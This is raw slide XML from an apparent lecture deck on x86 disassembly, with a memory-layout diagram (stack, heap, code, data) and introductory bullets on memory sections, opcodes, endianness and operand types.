            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5085000" y="3289320"/>
              <a:ext cx="988560" cy="118836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ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Main</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>RAM</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="406" name="CustomShape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4356360" y="4267800"/>
              <a:ext cx="728280" cy="330480"/>
            </a:xfrm>
            <a:prstGeom prst="leftRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="407" name="CustomShape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2485080" y="2294640"/>
              <a:ext cx="57384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CPU</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2102760" y="3623400"/>
              <a:ext cx="450360" cy="313200"/>
            </a:xfrm>
            <a:prstGeom prst="leftRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="CustomShape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1947240" y="4997520"/>
              <a:ext cx="719640" cy="355320"/>
            </a:xfrm>
            <a:prstGeom prst="leftRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="410" name="CustomShape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2753640" y="4338360"/>
              <a:ext cx="450360" cy="313200"/>
            </a:xfrm>
            <a:prstGeom prst="leftRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020360" y="2919960"/>
            <a:ext cx="1944000" cy="3677040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164360" y="3429000"/>
            <a:ext cx="1656000" cy="3024000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="CustomShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236720" y="2919960"/>
            <a:ext cx="151128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Main memory</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="CustomShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7665840" y="3595320"/>
            <a:ext cx="67680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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="CustomShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7653960" y="4310640"/>
            <a:ext cx="67644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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="CustomShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666560" y="5157360"/>
            <a:ext cx="66672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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="CustomShape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693920" y="5998320"/>
            <a:ext cx="62028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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="CustomShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7164360" y="4082760"/>
            <a:ext cx="1656000" cy="360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="CustomShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7206480" y="4814640"/>
            <a:ext cx="1656000" cy="360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="CustomShape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7204320" y="5858640"/>
            <a:ext cx="1656000" cy="360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="CustomShape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407640" y="3399840"/>
            <a:ext cx="61236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LMA</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="CustomShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407640" y="6045480"/>
            <a:ext cx="65880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HMA</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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="24000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>This term can be used to refer to a specific section of memory called the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>data section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains values that are put in place when a program is initially loaded. These values are sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they may not change while the program is running, or they may be called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they are available to any part of the program.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Code includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does and how the program’s tasks will be orchestrated.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>The heap is used for dynamic memory during program execution, to create (allocate) new values and eliminate (free) values that the program no longer needs. The heap is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dynamic memory </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>because its contents can change frequently while the program is running.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>The stack is used for local variables and parameters for functions, and to help control program flow. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-209160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426"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Instruction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Opcodes and Endianness</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Operands</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Immediate: 0x42</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Register: ecx</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory address: [eax]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="427" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619640" y="1700640"/>
          <a:ext cx="6095520" cy="741240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
              </a:tblGrid>
              <a:tr h="370800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
